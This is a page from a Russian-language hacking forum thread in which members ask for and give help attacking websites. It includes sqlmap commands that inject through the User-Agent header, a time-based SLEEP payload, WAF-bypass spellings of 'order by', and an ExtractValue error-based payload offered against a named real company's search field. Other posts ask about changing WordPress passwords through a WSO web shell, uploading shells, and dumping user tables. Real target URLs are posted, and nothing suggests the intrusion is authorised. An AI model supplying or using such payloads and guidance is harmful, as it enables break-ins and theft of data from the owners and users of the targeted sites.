Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 1196 of 1207
  1. preno

    preno Member

    Joined:
    5 Sep 2010
    Messages:
    249
    Likes Received:
    6
    Reputations:
    0
    Ребята, как скулмапу скормить урл и если SQL в заголовке урла, как это сделать? Есть примеры?
     
    #23901 preno, 26 Feb 2015
  2. lifescore

    lifescore Elder - Старейшина

    Joined:
    27 Aug 2011
    Messages:
    651
    Likes Received:
    511
    Reputations:
    72
    ./sqlmap.py --headers="User-Agent: Mozilla/5.0 Gecko/20120101 Firefox/26.0" --cookie="%Query_Cookie%" -u 'http://url.com/path/?id=1' --level=5 risk=3 -p %Parametr%

    Или
    -r и путь к файлу с HTTP запросом
    PHP:
    POST /vuln.php HTTP/1.1
    Host    www.target.com
    User    -AgentMozilla/4.0

    id    =1
     
    #23902 lifescore, 26 Feb 2015
    Last edited: 26 Feb 2015
  3. yeti2

    yeti2 New Member

    Joined:
    15 Sep 2013
    Messages:
    76
    Likes Received:
    2
    Reputations:
    0
    Ребят , какой запрос в wso shell сделать , чтобы поменять Пароль в mysql базе . Допустим wordpress password "user_pass"
     
    #23903 yeti2, 26 Feb 2015
  4. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Сразу задавайте вопросы в соответвствующей теме.
    Strilo4ka вчера Вам отвечал:
     
    #23904 YaBtr, 26 Feb 2015
  5. 5maks5

    5maks5 Elder - Старейшина

    Joined:
    29 Aug 2010
    Messages:
    451
    Likes Received:
    264
    Reputations:
    40
    Юзать последнюю версию WSO.
    Вот что она умеет:
    [​IMG]
     
    #23905 5maks5, 26 Feb 2015
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    админка есть? может слить только администраторов и залиться?
     
    _________________________
    #23906 yarbabin, 26 Feb 2015
  7. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    sql инъекция

    Помогите пожалуйста
    когда делаю запрос через order by дает такой ответ

    A Database Error Occurred

    Error Number: 1054

    Unknown column '3_order_by_80' in 'where clause'

    SELECT * FROM authors where id=3_order_by_80 limit 0,1
    можно из бд что то вытащить?
     
    #23907 teh, 27 Feb 2015
  8. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    откуда нижнее подчеркивание? почему limit? перечитайте статьи по sqli и пройдите хотя бы базовое введение в sql
     
    _________________________
    #23908 yarbabin, 28 Feb 2015
  9. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    нет, я набираю 3 order by 80--

    а в ответ получаю

    A Database Error Occurred
    Error Number: 1054
    Unknown column '3_order_by_80' in 'where clause'
    SELECT * FROM authors where id=3_order_by_80 limit 0,1
     
    #23909 teh, 28 Feb 2015
  10. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    "набери" 3+order+by+80-- или 3/**/order/**/by/**/80--
     
    _________________________
    #23910 kingbeef, 28 Feb 2015
  11. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    да, я набирал, но выдает ошибку

    An Error Was Encountered
    The URI you submitted has disallowed characters.

    И на коментарий и на плюс
     
    #23911 teh, 28 Feb 2015
    Last edited: 28 Feb 2015
  12. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Так можно долго гадать какой вариант сработает, и по сути получается один оффтоп, хотите увидеть результат, публикуйте ссылку.
     
    _________________________
    #23912 winstrool, 28 Feb 2015
  13. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    http://4vlada.com/blogs/3
     
    #23913 teh, 28 Feb 2015
  14. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Есть способ заливки шелла через infophp.php при отсутствии инклуда?!
     
    #23914 Unknowhacker, 1 Mar 2015
  15. andrxx

    andrxx Banned

    Joined:
    7 Nov 2013
    Messages:
    51
    Likes Received:
    6
    Reputations:
    0
    есть, но необходимо наличие фтп или цпанель
     
    #23915 andrxx, 1 Mar 2015
  16. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    ftp://site.com - доступ требует авторизацию, ЦП панель так же требует авторизацию. Ну и какой способ
     
    #23916 Unknowhacker, 1 Mar 2015
  17. preno

    preno Member

    Joined:
    5 Sep 2010
    Messages:
    249
    Likes Received:
    6
    Reputations:
    0
    Способ на первый взгляд сработал, вектор запросов найден, timebased SQL, я дошёл до финальной стадии когда SQLmap предлагает ввести произвольный SQL запрос и выполнить его, однако он не выполняется, на любой запрос выводит none
    Пробую способ:
    ./sqlmap.py --headers="User-Agent: Mozilla/5.0 Gecko/20120101 *" -u "http://url.com/path/?id=1" --level=5 risk=3 --dbms="MySQL"
    Вектор атаки найден:
    Payload: User-Agent: Mozilla/5.0 Gecko/20120101') AND SLEEP(5)#
    Однако, в SQL иньекции фильтруются запятые, а так как я не силен в timebased векторах, то даже предположить не могу, возможно ли провести timebased атаку без запятых и выполнить грубо говоря запрос select password from user
    После найденного вектора запускаю скрипт:
    ./sqlmap.py --headers="User-Agent: Mozilla/5.0 Gecko/20120101 *" -u "http://url.com/path/?id=1" --level=5 risk=3 --dbms="MySQL" --sql-query="SELECT user()"
    Он ждет минут 5-10 в retrieved:, пытается выполнить запрос и вытащить ответ, и по истечению времени вываливает:
    SELECT user(): None
    И так на любой SQL запрос. И вот вопрос, это из за запятых невозможно провести атаку, или я что то не так делаю? Подскажите пожалуйста!
     
    #23917 preno, 1 Mar 2015
  18. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Интересует вывод таблиц из этой инъекции:
    Code:
    http://naftogaz-europe.com
    Note: в поле поиск '
     
    #23918 Unknowhacker, 1 Mar 2015
    Last edited: 1 Mar 2015
  19. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    'or(ExtractValue(1,concat(0x3a,(select(table_name)from(information_schema.tables)limit/**/0,1))))='1
     
    _________________________
    #23919 kingbeef, 1 Mar 2015
    2 people like this.
  20. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Каким образом под никсами слить огромную таблицу с юзерами? SQLMap даже не может.
     
    #23920 MaxFast, 3 Mar 2015
(You must log in or sign up to post here.)
Page 1196 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.